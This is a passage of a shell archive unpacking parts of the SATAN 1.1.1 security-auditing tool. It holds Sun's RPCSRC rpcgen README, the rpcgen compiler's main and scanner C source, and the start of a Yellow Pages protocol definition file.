X for (i = 0; i < len; i++)
X ((char *)output)[i] = (char)value;
X}
END_OF_FILE
if test 10423 -ne `wc -c <'satan-1.1.1/src/misc/md5c.c'`; then
echo shar: \"'satan-1.1.1/src/misc/md5c.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/misc/md5c.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/README' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/README'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/README'\" $9986 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/README' <<'END_OF_FILE'
XThis rpcgen source core comes from the freely distributable RPCSRC 4.0
Xrelease by Sun Microsystems, Inc (see README below). All I did was to
Xmake it easier to build in an ANSI and POSIX environment. No changes to
Xprogram logic were needed.
X
X Wietse
X
XRPCSRC 4.0 7/11/89
X
XThis distribution contains Sun Microsystem's implementation of the
XRPC and XDR protocols and is compatible with 4.2BSD and 4.3BSD. Also
Xincluded is complete documentation, utilities, RPC service
Xspecification files, and demonstration services in the format used by
Xthe RPC protocol compiler (rpcgen). See WHAT'S NEW below for
Xdetails.
X
XNOTE ABOUT SECURE RPC:
X
XThis release of RPCSRC contains most of the code needed to implement
XSecure RPC (see "DES Authentication" in the RPC Protocol Specification,
Xdoc/rpc.rfc.ms). Due to legal considerations, we are unable to
Xdistribute an implementation of DES, the Data Encryption Standard, which
XSecure RPC requires. For this reason, all of the files, documentation, and
Xprograms associated with Secure RPC have been placed into a separate
Xdirectory, secure_rpc. The RPC library contained in the main body of this
Xrelease *DOES NOT* support Secure RPC. See secure_rpc/README for more
Xdetails. (A DES library was posted in Volume 18 of comp.sources.unix.)
X
XIf you wish to report bugs found in this release, send mail to:
X
XPortable ONC/NFS
XSun Microsystems, Inc
XMS 12-33
X2550 Garcia Avenue
XMountain View, CA 94043
X
Xor send Email to nfs...@sun.com (the Internet) or sun!nfsnet (Usenet).
X
XROADMAP
X
XThe directory hierarchy is as follows:
X
X demo/ Various demonstration services
X demo/dir Remote directory lister
X demo/msg Remote console message delivery service
X demo/sort Remote sort service
X
X doc/ Documentation for RPC, XDR and NFS in "-ms" format.
X
X etc/ Utilities (rpcinfo and portmap). portmap must be
X started by root before any other RPC network services are
X used. SEE BELOW FOR BUGFIX TO 4.3BSD COMPILER.
X
X man/ Manual pages for RPC library, rpcgen, and utilities.
X
X rpc/ The RPC and XDR library. SEE BELOW
X FOR BUGFIX TO 4.2BSD COMPILER.
X
X rpcgen/ The RPC Language compiler (for .x files)
X
X rpcsvc/ Service definition files for various services and the
X server and client code for the Remote Status service.
X
X secure_rpc/ The files in this directory are used to build a version of
X the RPC library with DES Authentication. See the README
X file in that directory for more details.
X
XBUILD INSTRUCTIONS
X
XMakefiles can be found in all directories except for man. The
XMakefile in the top directory will cause these others to be invoked
X(except for in the doc, man and demo directories), in turn building the
Xentire release.
X
XWARNING! THE DEFAULT INSTALLATION PROCEDURES WILL INSTALL FILES
XIN /usr/include, /usr/lib, /usr/bin and /etc.
X
XThe master RPC include file, rpc/rpc.h, is used by all programs and
Xroutines that use RPC. It includes other RPC and system include files
Xneeded by the RPC system. PLEASE NOTE: If your system has NFS, it
Xmay have been based on Sun's NFS Source. The include files installed
Xby this package may duplicate include files you will find on your NFS
Xsystem. The RPCSRC 4.0 include files are upwardly compatible to all
XNFS Source include files as of the date of this distribution (not
Xincluding any new definitions or declarations added by your system
Xvendor). HOWEVER: Please read the comments towards the end of
Xrpc/rpc.h regarding rpc/netdb.h. You may need to uncomment the
Xinclusion of that file if the structures it defines are already
Xdefined by your system's include files.
X
XAfter making any compiler fixes that are needed (see below), at
Xthe top directory, type:
X
X make install
X
XFor all installations, the Makefile macro DESTDIR is prepended to the
Xinstallation path. It is defined to be null in the Makefiles, so
Xinstallations are relative to root. (You will probably need root
Xprivileges for installing the files under the default path.) To
Xinstall the files under some other tree (e.g., /usr/local), use the
Xcommand:
X
X make install DESTDIR=/usr/local
X
XThis will place the include files in /usr/local/usr/include, the RPC
Xlibrary in /usr/local/usr/lib, rpcgen in /usr/local/usr/bin, and the
Xutilities in /usr/local/etc. You'll have to edit the Makefiles or
Xinstall the files by hand if you want to do anything other than this
Xkind of relocation of the installation tree.
X
XThe RPC library will be built and installed first. By default it is
Xinstalled in /usr/lib as "librpclib.a". The directory
X/usr/include/rpc will also be created, and several header files will
Xbe installed there. ALL RPC SERVICES INCLUDE THESE HEADER FILES.
X
XThe programs in etc/ link in routines from librpclib.a. If you change
Xwhere it is installed, be sure to edit etc/'s Makefile to reflect this.
XThese programs are installed in /etc. PORTMAP MUST BE RUNNING ON
XYOUR SYSTEM BEFORE YOU START ANY OTHER RPC SERVICE.
X
Xrpcgen is installed in /usr/bin. This program is required to build
Xthe demonstration services in demo and the rstat client and server in
Xrpcsvc/.
X
XThe rpcsvc/ directory will install its files in the directory
X/usr/include/rpcsvc. The Remote Status service (rstat_svc) will be
Xcompiled and installed in /etc. If you wish to make this service
Xavailable, you should either start this service when needed or have
Xit started at boot time by invoking it in your /etc/rc.local script.
X(Be sure that portmap is started first!) Sun has modified its
Xversion of inetd to automatically start RPC services. (Use "make
XLIB=" when building rstat on a Sun Workstation.) The Remote Status
Xclient (rstat) will be installed in /usr/bin. This program queries
Xthe rstat_svc on a remote host and prints a system status summary
Xsimilar to the one printed by "uptime".
X
XThe documentation is not built during the "make install" command.
XTyping "make" in the doc directory will cause all of the manuals to
Xbe formatted using nroff into a single file. We have had a report
Xthat certain "troff" equivalents have trouble processing the full
Xmanual. If you have trouble, try building the manuals individually
X(see the Makefile).
X
XThe demonstration services in the demo directory are not built by the
Xtop-level "make install" command. To build these, cd to the demo
Xdirectory and enter "make". The three services will be built.
XRPCGEN MUST BE INSTALLED in a path that make can find. To run the
Xservices, start the portmap program as root and invoke the service
X(you probably will want to put it in the background). rpcinfo can be
Xused to check that the service succeeded in getting registered with
Xportmap, and to ping the service (see rpcinfo's man page). You can
Xthen use the corresponding client program to exercise the service.
XTo build these services on a Sun workstation, you must prevent the
XMakefile from trying to link the RPC library (as these routines are
Xalready a part of Sun's libc). Use: "make LIB=".
X
XBUGFIX FOR 4.3BSD COMPILER
X
XThe use of a 'void *' declaration for one of the arguments in
Xthe reply_proc() procedure in etc/rpcinfo.c will trigger a bug
Xin the 4.3BSD compiler. The bug is fixed by the following change to
Xthe compiler file mip/manifest.h:
X
X*** manifest.h.r1.1 Thu Apr 30 13:52:25 1987
X--- manifest.h.r1.2 Mon Nov 23 18:58:17 1987
X***************
X*** 21,27 ****
X /*
X * Bogus type values
X */
X! #define TNULL PTR /* pointer to UNDEF */
X #define TVOID FTN /* function returning UNDEF (for void) */
X
X /*
X--- 21,27 ----
X /*
X * Bogus type values
X */
X! #define TNULL INCREF(MOETY) /* pointer to MOETY -- impossible type */
X #define TVOID FTN /* function returning UNDEF (for void) */
X
X /*
X
XIf you cannot fix your compiler, change the declaration in reply_proc()
Xfrom 'void *' to 'char *'.
X
XBUGFIX FOR 4.2BSD COMPILER
X
XUnpatched 4.2BSD compilers complain about valid C. You can make old
Xcompilers happy by changing some voids to ints. However, the fix to
Xthe 4.2 VAX compiler is as follows (to mip/trees.c):
X
X*** trees.c.r1.1 Mon May 11 13:47:58 1987
X--- trees.c.r1.2 Wed Jul 2 18:28:52 1986
X***************
X*** 1247,1253 ****
X if(o==CAST && mt1==0)return(TYPL+TYMATCH);
X if( mt12 & MDBI ) return( TYPL+LVAL+TYMATCH );
X else if( (mt1&MENU)||(mt2&MENU) ) return( LVAL+NCVT+TYPL+PTMATCH+PUN );
X! else if( mt12 == 0 ) break;
X else if( mt1 & MPTR ) return( LVAL+PTMATCH+PUN );
X else if( mt12 & MPTI ) return( TYPL+LVAL+TYMATCH+PUN );
X break;
X--- 1261,1269 ----
X if(o==CAST && mt1==0)return(TYPL+TYMATCH);
X if( mt12 & MDBI ) return( TYPL+LVAL+TYMATCH );
X else if( (mt1&MENU)||(mt2&MENU) ) return( LVAL+NCVT+TYPL+PTMATCH+PUN );
X! /* if right is TVOID and looks like a CALL, is not ok */
X! else if (mt2 == 0 && (p->in.right->in.op == CALL || p->in.right->in.op == UNARY CALL))
X! break;
X else if( mt1 & MPTR ) return( LVAL+PTMATCH+PUN );
X else if( mt12 & MPTI ) return( TYPL+LVAL+TYMATCH+PUN );
X break;
X
XWHAT'S NEW IN THIS RELEASE: RPCSRC 4.0
X
XThe previous release was RPCSRC 3.9. As with all previous releases,
Xthis release is based directly on files from Sun Microsystem's
Ximplementation.
X
XUpgrade from RPCSRC 3.9
X
X1) RPCSRC 4.0 upgrades RPCSRC 3.9. Improvements from SunOS 4.0 have
X been integrated into this release.
X
XSecure RPC (in the secure_rpc/ directory)
X
X2) DES Authentication routines and programs are provided.
X3) A new manual, "Secure NFS" is provided, which describes Secure RPC
X and Secure NFS.
X4) Skeleton routines and manual pages are provided which describe the
X DES encryption procedures required by Secure RPC. HOWEVER, NO DES
X ROUTINE IS PROVIDED.
X
XNew Functionality
X
X5) rpcinfo can now be used to de-register services from the portmapper
X which may have terminated abnormally.
X6) A new client, rstat, is provided which queries the rstat_svc and
X prints a status line similar to the one displayed by "uptime".
END_OF_FILE
if test 9986 -ne `wc -c <'satan-1.1.1/src/rpcgen/README'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/README'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/README'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_main.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_main.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_main.c'\" $9321 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_main.c' <<'END_OF_FILE'
X/* @(#)rpc_main.c 2.2 88/08/01 4.0 RPCSRC */

X/*
X * Sun RPC is a product of Sun Microsystems, Inc. and is provided for
X * unrestricted use provided that this legend is included on all tape
X * media and as a part of the software program in whole or part. Users
X * may copy or modify Sun RPC without charge, but are not authorized
X * to license or distribute it to anyone else except as part of a product or

X * program developed by the user.
X *

X * SUN RPC IS PROVIDED AS IS WITH NO WARRANTIES OF ANY KIND INCLUDING THE
X * WARRANTIES OF DESIGN, MERCHANTIBILITY AND FITNESS FOR A PARTICULAR
X * PURPOSE, OR ARISING FROM A COURSE OF DEALING, USAGE OR TRADE PRACTICE.
X *
X * Sun RPC is provided with no support and without any obligation on the
X * part of Sun Microsystems, Inc. to assist in its use, correction,
X * modification or enhancement.
X *
X * SUN MICROSYSTEMS, INC. SHALL HAVE NO LIABILITY WITH RESPECT TO THE
X * INFRINGEMENT OF COPYRIGHTS, TRADE SECRETS OR ANY PATENTS BY SUN RPC
X * OR ANY PART THEREOF.
X *
X * In no event will Sun Microsystems, Inc. be liable for any lost revenue
X * or profits or other special, indirect and consequential damages, even if
X * Sun has been advised of the possibility of such damages.
X *
X * Sun Microsystems, Inc.
X * 2550 Garcia Avenue
X * Mountain View, California 94043
X */
X#ifndef lint

Xstatic char sccsid[] = "@(#)rpc_main.c 1.7 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_main.c, Top level of the RPC protocol compiler.
X * Copyright (C) 1987, Sun Microsystems, Inc.
X */
X
X#include <stdio.h>

X#include <string.h>
X#include <stdlib.h>
X#include <unistd.h>

X#include <sys/file.h>
X#include "rpc_util.h"
X#include "rpc_parse.h"
X#include "rpc_scan.h"
X
X#define EXTEND 1 /* alias for TRUE */
X
Xstruct commandline {
X int cflag;
X int hflag;
X int lflag;
X int sflag;
X int mflag;
X char *infile;
X char *outfile;
X};
X
Xstatic char *cmdname;
Xstatic char CPP[] = "cc";
X#define CPPFLAGS "-C", "-E"
Xstatic char *allv[] = {
X "rpcgen", "-s", "udp", "-s", "tcp",
X};
Xstatic int allc = sizeof(allv)/sizeof(allv[0]);
X
Xstatic c_output();
Xstatic h_output();
Xstatic s_output();
Xstatic l_output();
Xstatic do_registers();
Xstatic parseargs();
X
Xmain(argc, argv)
X int argc;
X char *argv[];
X
X{
X struct commandline cmd;
X
X if (!parseargs(argc, argv, &cmd)) {
X f_print(stderr,
X "usage: %s infile\n", cmdname);
X f_print(stderr,
X " %s [-c | -h | -l | -m] [-o outfile] [infile]\n",
X cmdname);
X f_print(stderr,
X " %s [-s udp|tcp]* [-o outfile] [infile]\n",
X cmdname);
X exit(1);
X }
X if (cmd.cflag) {
X c_output(cmd.infile, "-DRPC_XDR", !EXTEND, cmd.outfile);
X } else if (cmd.hflag) {
X h_output(cmd.infile, "-DRPC_HDR", !EXTEND, cmd.outfile);
X } else if (cmd.lflag) {
X l_output(cmd.infile, "-DRPC_CLNT", !EXTEND, cmd.outfile);
X } else if (cmd.sflag || cmd.mflag) {
X s_output(argc, argv, cmd.infile, "-DRPC_SVC", !EXTEND,
X cmd.outfile, cmd.mflag);
X } else {
X c_output(cmd.infile, "-DRPC_XDR", EXTEND, "_xdr.c");
X reinitialize();
X h_output(cmd.infile, "-DRPC_HDR", EXTEND, ".h");
X reinitialize();
X l_output(cmd.infile, "-DRPC_CLNT", EXTEND, "_clnt.c");
X reinitialize();
X s_output(allc, allv, cmd.infile, "-DRPC_SVC", EXTEND,
X "_svc.c", cmd.mflag);

X }
X exit(0);
X}
X

X/*
X * add extension to filename
X */
Xstatic char *
Xextendfile(file, ext)
X char *file;
X char *ext;
X{
X char *res;
X char *p;
X
X res = alloc(strlen(file) + strlen(ext) + 1);
X if (res == NULL) {
X abort();
X }
X p = strchr(file, '.');
X if (p == NULL) {
X p = file + strlen(file);
X }
X (void) strcpy(res, file);
X (void) strcpy(res + (p - file), ext);
X return (res);
X}
X
X/*
X * Open output file with given extension
X */
Xstatic
Xopen_output(infile, outfile)
X char *infile;
X char *outfile;
X{
X if (outfile == NULL) {
X fout = stdout;
X return;
X }
X if (infile != NULL && streq(outfile, infile)) {
X f_print(stderr, "%s: output would overwrite %s\n", cmdname,
X infile);
X crash();
X }
X fout = fopen(outfile, "w");
X if (fout == NULL) {
X f_print(stderr, "%s: unable to open ", cmdname);
X perror(outfile);
X crash();
X }
X record_open(outfile);
X}
X
X/*
X * Open input file with given define for C-preprocessor
X */
Xstatic
Xopen_input(infile, define)
X char *infile;
X char *define;
X{
X int pd[2];
X
X infilename = (infile == NULL) ? "<stdin>" : infile;
X (void) pipe(pd);
X switch (fork()) {
X case 0:
X (void) close(1);
X (void) dup2(pd[1], 1);
X (void) close(pd[0]);
X execlp(CPP, CPP, CPPFLAGS, define, infile, NULL);
X perror("execlp");
X exit(1);
X case -1:
X perror("fork");
X exit(1);
X }
X (void) close(pd[1]);
X fin = fdopen(pd[0], "r");
X if (fin == NULL) {
X f_print(stderr, "%s: ", cmdname);
X perror(infilename);
X crash();
X }
X}
X
X/*
X * Compile into an XDR routine output file
X */
Xstatic
Xc_output(infile, define, extend, outfile)
X char *infile;
X char *define;
X int extend;
X char *outfile;
X{
X definition *def;
X char *include;
X char *outfilename;
X long tell;
X
X open_input(infile, define);
X outfilename = extend ? extendfile(infile, outfile) : outfile;
X open_output(infile, outfilename);
X f_print(fout, "#include <sys/time.h>\n");
X f_print(fout, "#include <rpc/rpc.h>\n");
X if (infile && (include = extendfile(infile, ".h"))) {
X f_print(fout, "#include \"%s\"\n", include);
X free(include);
X }
X tell = ftell(fout);
X while (def = get_definition()) {
X emit(def);
X }
X if (extend && tell == ftell(fout)) {
X (void) unlink(outfilename);
X }
X}
X
X/*
X * Compile into an XDR header file
X */
Xstatic
Xh_output(infile, define, extend, outfile)
X char *infile;
X char *define;
X int extend;
X char *outfile;
X{
X definition *def;
X char *outfilename;
X long tell;
X
X open_input(infile, define);
X outfilename = extend ? extendfile(infile, outfile) : outfile;
X open_output(infile, outfilename);
X tell = ftell(fout);
X while (def = get_definition()) {
X print_datadef(def);
X }
X if (extend && tell == ftell(fout)) {
X (void) unlink(outfilename);
X }
X}
X
X/*
X * Compile into an RPC service
X */
Xstatic
Xs_output(argc, argv, infile, define, extend, outfile, nomain)
X int argc;
X char *argv[];
X char *infile;
X char *define;
X int extend;
X char *outfile;
X int nomain;
X{
X char *include;
X definition *def;
X int foundprogram;
X char *outfilename;
X
X open_input(infile, define);
X outfilename = extend ? extendfile(infile, outfile) : outfile;
X open_output(infile, outfilename);
X f_print(fout, "#include <stdio.h>\n");
X f_print(fout, "#include <sys/time.h>\n");
X f_print(fout, "#include <rpc/rpc.h>\n");
X if (infile && (include = extendfile(infile, ".h"))) {
X f_print(fout, "#include \"%s\"\n", include);
X free(include);
X }
X foundprogram = 0;
X while (def = get_definition()) {
X foundprogram |= (def->def_kind == DEF_PROGRAM);
X }
X if (extend && !foundprogram) {
X (void) unlink(outfilename);
X return;
X }
X if (nomain) {
X write_programs((char *)NULL);
X } else {
X write_most();
X do_registers(argc, argv);
X write_rest();
X write_programs("static");
X }
X}
X
Xstatic
Xl_output(infile, define, extend, outfile)
X char *infile;
X char *define;
X int extend;
X char *outfile;
X{
X char *include;
X definition *def;
X int foundprogram;
X char *outfilename;
X
X open_input(infile, define);
X outfilename = extend ? extendfile(infile, outfile) : outfile;
X open_output(infile, outfilename);
X f_print(fout, "#include <sys/time.h>\n");
X f_print(fout, "#include <rpc/rpc.h>\n");
X if (infile && (include = extendfile(infile, ".h"))) {
X f_print(fout, "#include \"%s\"\n", include);
X free(include);
X }
X foundprogram = 0;
X while (def = get_definition()) {
X foundprogram |= (def->def_kind == DEF_PROGRAM);
X }
X if (extend && !foundprogram) {
X (void) unlink(outfilename);
X return;
X }
X write_stubs();
X}
X
X/*
X * Perform registrations for service output
X */
Xstatic
Xdo_registers(argc, argv)
X int argc;
X char *argv[];
X
X{
X int i;
X
X for (i = 1; i < argc; i++) {
X if (streq(argv[i], "-s")) {
X write_register(argv[i + 1]);
X i++;

X }
X }
X}
X
X/*

X * Parse command line arguments
X */
Xstatic
Xparseargs(argc, argv, cmd)
X int argc;
X char *argv[];
X struct commandline *cmd;
X
X{
X int i;
X int j;
X char c;
X char flag[(1 << 8 * sizeof(char))];
X int nflags;
X
X cmdname = argv[0];
X cmd->infile = cmd->outfile = NULL;
X if (argc < 2) {
X return (0);
X }
X flag['c'] = 0;
X flag['h'] = 0;
X flag['s'] = 0;
X flag['o'] = 0;
X flag['l'] = 0;
X flag['m'] = 0;
X for (i = 1; i < argc; i++) {
X if (argv[i][0] != '-') {
X if (cmd->infile) {
X return (0);
X }
X cmd->infile = argv[i];
X } else {
X for (j = 1; argv[i][j] != 0; j++) {
X c = argv[i][j];
X switch (c) {
X case 'c':
X case 'h':
X case 'l':
X case 'm':
X if (flag[c]) {
X return (0);
X }
X flag[c] = 1;
X break;
X case 'o':
X case 's':
X if (argv[i][j - 1] != '-' ||
X argv[i][j + 1] != 0) {
X return (0);
X }
X flag[c] = 1;
X if (++i == argc) {
X return (0);
X }
X if (c == 's') {
X if (!streq(argv[i], "udp") &&
X !streq(argv[i], "tcp")) {
X return (0);
X }
X } else if (c == 'o') {
X if (cmd->outfile) {
X return (0);
X }
X cmd->outfile = argv[i];
X }
X goto nextarg;
X
X default:

X return (0);
X }
X }

X nextarg:
X ;
X }
X }
X cmd->cflag = flag['c'];
X cmd->hflag = flag['h'];
X cmd->sflag = flag['s'];
X cmd->lflag = flag['l'];
X cmd->mflag = flag['m'];
X nflags = cmd->cflag + cmd->hflag + cmd->sflag + cmd->lflag + cmd->mflag;
X if (nflags == 0) {
X if (cmd->outfile != NULL || cmd->infile == NULL) {
X return (0);
X }
X } else if (nflags > 1) {
X return (0);
X }
X return (1);
X}
END_OF_FILE
if test 9321 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_main.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_main.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_main.c'
fi
if test -f 'satan-1.1.1/src/rpcgen/rpc_scan.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/rpcgen/rpc_scan.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/rpcgen/rpc_scan.c'\" $8442 characters$
sed "s/^X//" >'satan-1.1.1/src/rpcgen/rpc_scan.c' <<'END_OF_FILE'
X/* @(#)rpc_scan.c 2.1 88/08/01 4.0 RPCSRC */

X * program developed by the user.
X *

Xstatic char sccsid[] = "@(#)rpc_scan.c 1.6 87/06/24 (C) 1987 SMI";
X#endif
X
X/*
X * rpc_scan.c, Scanner for the RPC protocol compiler
X * Copyright (C) 1987, Sun Microsystems, Inc.
X */
X#include <stdio.h>
X#include <ctype.h>
X#include <stdlib.h>
X#include <unistd.h>
X#include <string.h>
X#include "rpc_scan.h"
X#include "rpc_util.h"
X
X#define startcomment(where) (where[0] == '/' && where[1] == '*')
X#define endcomment(where) (where[-1] == '*' && where[0] == '/')
X
Xstatic int pushed = 0; /* is a token pushed */
Xstatic token lasttok; /* last token, if pushed */
X
Xstatic unget_token();
Xstatic findstrconst();
Xstatic findconst();
Xstatic findkind();
Xstatic cppline();
Xstatic directive();
Xstatic printdirective();
Xstatic docppline();
X
X/*
X * scan expecting 1 given token
X */
Xvoid
Xscan(expect, tokp)
X tok_kind expect;
X token *tokp;
X{
X get_token(tokp);
X if (tokp->kind != expect) {
X expected1(expect);
X }
X}
X
X/*
X * scan expecting 2 given tokens
X */
Xvoid
Xscan2(expect1, expect2, tokp)
X tok_kind expect1;
X tok_kind expect2;
X token *tokp;
X{
X get_token(tokp);
X if (tokp->kind != expect1 && tokp->kind != expect2) {
X expected2(expect1, expect2);
X }
X}
X
X/*
X * scan expecting 3 given token
X */
Xvoid
Xscan3(expect1, expect2, expect3, tokp)
X tok_kind expect1;
X tok_kind expect2;
X tok_kind expect3;
X token *tokp;
X{
X get_token(tokp);
X if (tokp->kind != expect1 && tokp->kind != expect2
X && tokp->kind != expect3) {
X expected3(expect1, expect2, expect3);

X }
X}
X
X
X/*

X * scan expecting a constant, possibly symbolic
X */
Xvoid
Xscan_num(tokp)
X token *tokp;
X{
X get_token(tokp);
X switch (tokp->kind) {
X case TOK_IDENT:
X break;
X default:
X error("constant or identifier expected");

X }
X}
X
X
X/*

X * Peek at the next token
X */
Xvoid
Xpeek(tokp)
X token *tokp;
X{
X get_token(tokp);
X unget_token(tokp);
X}
X
X
X/*
X * Peek at the next token and scan it if it matches what you expect
X */
Xint
Xpeekscan(expect, tokp)
X tok_kind expect;
X token *tokp;
X{
X peek(tokp);
X if (tokp->kind == expect) {
X get_token(tokp);
X return (1);
X }
X return (0);

X}
X
X
X
X/*

X * Get the next token, printing out any directive that are encountered.
X */
Xvoid
Xget_token(tokp)
X token *tokp;
X{
X int commenting;
X
X if (pushed) {
X pushed = 0;
X *tokp = lasttok;
X return;
X }
X commenting = 0;
X for (;;) {
X if (*where == 0) {
X for (;;) {
X if (!fgets(curline, MAXLINESIZE, fin)) {
X tokp->kind = TOK_EOF;
X *where = 0;
X return;
X }
X linenum++;
X if (commenting) {
X break;
X } else if (cppline(curline)) {
X docppline(curline, &linenum,
X &infilename);
X } else if (directive(curline)) {
X printdirective(curline);
X } else {
X break;
X }
X }
X where = curline;
X } else if (isspace(*where)) {
X while (isspace(*where)) {
X where++; /* eat */
X }
X } else if (commenting) {
X where++;
X if (endcomment(where)) {
X where++;
X commenting--;
X }
X } else if (startcomment(where)) {
X where += 2;
X commenting++;
X } else {

X break;
X }
X }
X

X /*
X * 'where' is not whitespace, comment or directive Must be a token!
X */
X switch (*where) {
X case ':':
X tokp->kind = TOK_COLON;
X where++;
X break;
X case ';':
X tokp->kind = TOK_SEMICOLON;
X where++;
X break;
X case ',':
X tokp->kind = TOK_COMMA;
X where++;
X break;
X case '=':
X tokp->kind = TOK_EQUAL;
X where++;
X break;
X case '*':
X tokp->kind = TOK_STAR;
X where++;
X break;
X case '[':
X tokp->kind = TOK_LBRACKET;
X where++;
X break;
X case ']':
X tokp->kind = TOK_RBRACKET;
X where++;
X break;
X case '{':
X tokp->kind = TOK_LBRACE;
X where++;
X break;
X case '}':
X tokp->kind = TOK_RBRACE;
X where++;
X break;
X case '(':
X tokp->kind = TOK_LPAREN;
X where++;
X break;
X case ')':
X tokp->kind = TOK_RPAREN;
X where++;
X break;
X case '<':
X tokp->kind = TOK_LANGLE;
X where++;
X break;
X case '>':
X tokp->kind = TOK_RANGLE;
X where++;
X break;
X
X case '"':
X tokp->kind = TOK_STRCONST;
X findstrconst(&where, &tokp->str);
X break;
X
X case '-':
X case '0':
X case '1':
X case '2':
X case '3':
X case '4':
X case '5':
X case '6':
X case '7':
X case '8':
X case '9':
X tokp->kind = TOK_IDENT;
X findconst(&where, &tokp->str);
X break;
X
X
X default:
X if (!(isalpha(*where) || *where == '_')) {
X char buf[100];
X char *p;
X
X s_print(buf, "illegal character in file: ");
X p = buf + strlen(buf);
X if (isprint(*where)) {
X s_print(p, "%c", *where);
X } else {
X s_print(p, "%d", *where);
X }
X error(buf);
X }
X findkind(&where, tokp);

X break;
X }
X}
X

X
X
Xstatic
Xunget_token(tokp)
X token *tokp;
X{
X lasttok = *tokp;
X pushed = 1;
X}
X
X
Xstatic
Xfindstrconst(str, val)
X char **str;
X char **val;
X{
X char *p;
X int size;
X
X p = *str;
X do {
X *p++;
X } while (*p && *p != '"');
X if (*p == 0) {
X error("unterminated string constant");
X }
X p++;
X size = p - *str;
X *val = alloc(size + 1);
X (void) strncpy(*val, *str, size);
X (*val)[size] = 0;
X *str = p;
X}
X
Xstatic
Xfindconst(str, val)
X char **str;
X char **val;
X{
X char *p;
X int size;
X
X p = *str;
X if (*p == '0' && *(p + 1) == 'x') {
X p++;
X do {
X p++;
X } while (isxdigit(*p));
X } else {
X do {
X p++;
X } while (isdigit(*p));
X }
X size = p - *str;
X *val = alloc(size + 1);
X (void) strncpy(*val, *str, size);
X (*val)[size] = 0;
X *str = p;
X}
X
X
X
Xstatic token symbols[] = {
X {TOK_CONST, "const"},
X {TOK_UNION, "union"},
X {TOK_SWITCH, "switch"},
X {TOK_CASE, "case"},
X {TOK_DEFAULT, "default"},
X {TOK_STRUCT, "struct"},
X {TOK_TYPEDEF, "typedef"},
X {TOK_ENUM, "enum"},
X {TOK_OPAQUE, "opaque"},
X {TOK_BOOL, "bool"},
X {TOK_VOID, "void"},
X {TOK_CHAR, "char"},
X {TOK_INT, "int"},
X {TOK_UNSIGNED, "unsigned"},
X {TOK_SHORT, "short"},
X {TOK_LONG, "long"},
X {TOK_FLOAT, "float"},
X {TOK_DOUBLE, "double"},
X {TOK_STRING, "string"},
X {TOK_PROGRAM, "program"},
X {TOK_VERSION, "version"},
X {TOK_EOF, "??????"},
X};
X
X
Xstatic
Xfindkind(mark, tokp)
X char **mark;
X token *tokp;
X{
X
X int len;
X token *s;
X char *str;
X
X str = *mark;
X for (s = symbols; s->kind != TOK_EOF; s++) {
X len = strlen(s->str);
X if (strncmp(str, s->str, len) == 0) {
X if (!isalnum(str[len]) && str[len] != '_') {
X tokp->kind = s->kind;
X tokp->str = s->str;
X *mark = str + len;

X return;
X }
X }
X }

X tokp->kind = TOK_IDENT;
X for (len = 0; isalnum(str[len]) || str[len] == '_'; len++);
X tokp->str = alloc(len + 1);
X (void) strncpy(tokp->str, str, len);
X tokp->str[len] = 0;
X *mark = str + len;
X}
X
Xstatic
Xcppline(line)
X char *line;
X{
X return (line == curline && *line == '#');
X}
X
Xstatic
Xdirective(line)
X char *line;
X{
X return (line == curline && *line == '%');
X}
X
Xstatic
Xprintdirective(line)
X char *line;
X{
X f_print(fout, "%s", line + 1);
X}
X
Xstatic
Xdocppline(line, lineno, fname)
X char *line;
X int *lineno;
X char **fname;
X{
X char *file;
X int num;
X char *p;
X
X line++;
X while (isspace(*line)) {
X line++;
X }
X num = atoi(line);
X while (isdigit(*line)) {
X line++;
X }
X while (isspace(*line)) {
X line++;
X }
X if (*line != '"') {
X error("preprocessor error");
X }
X line++;
X p = file = alloc(strlen(line) + 1);
X while (*line && *line != '"') {
X *p++ = *line++;
X }
X if (*line == 0) {
X error("preprocessor error");
X }
X *p = 0;
X if (*file == 0) {
X *fname = NULL;
X } else {
X *fname = file;
X }
X *lineno = num - 1;
X}
END_OF_FILE
if test 8442 -ne `wc -c <'satan-1.1.1/src/rpcgen/rpc_scan.c'`; then
echo shar: \"'satan-1.1.1/src/rpcgen/rpc_scan.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/rpcgen/rpc_scan.c'
fi
if test -f 'satan-1.1.1/src/yp-chk/yp.x' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/yp-chk/yp.x'\"
else
echo shar: Extracting \"'satan-1.1.1/src/yp-chk/yp.x'\" $6297 characters$
sed "s/^X//" >'satan-1.1.1/src/yp-chk/yp.x' <<'END_OF_FILE'

X * program developed by the user.
X *

X/*
X * Protocol description file for the Yellow Pages Service
X */
X
X#ifndef RPC_HDR
X%#ifndef lint
X%/*static char sccsid[] = "from: @(#)YP.x 2.1 88/08/01 4.0 RPCSRC";*/
X%static char rcsid[] = "$Id: YP.x,v 1.1 1994/08/04 19:01:55 wollman Exp $";
X%#endif /* not lint */
X#endif
X
Xconst YPMAXRECORD = 1024;
Xconst YPMAXDOMAIN = 64;
Xconst YPMAXMAP = 64;
Xconst YPMAXPEER = 64;
X
X
Xenum YPstat {
X YP_TRUE = 1,
X YP_NOMORE = 2,
X YP_FALSE = 0,
X YP_NOMAP = -1,
X YP_NODOM = -2,
X YP_NOKEY = -3,
X YP_BADOP = -4,
X YP_BADDB = -5,
X YP_YPERR = -6,
X YP_BADARGS = -7,
X YP_VERS = -8
X};
X
X
Xenum YPxfrstat {
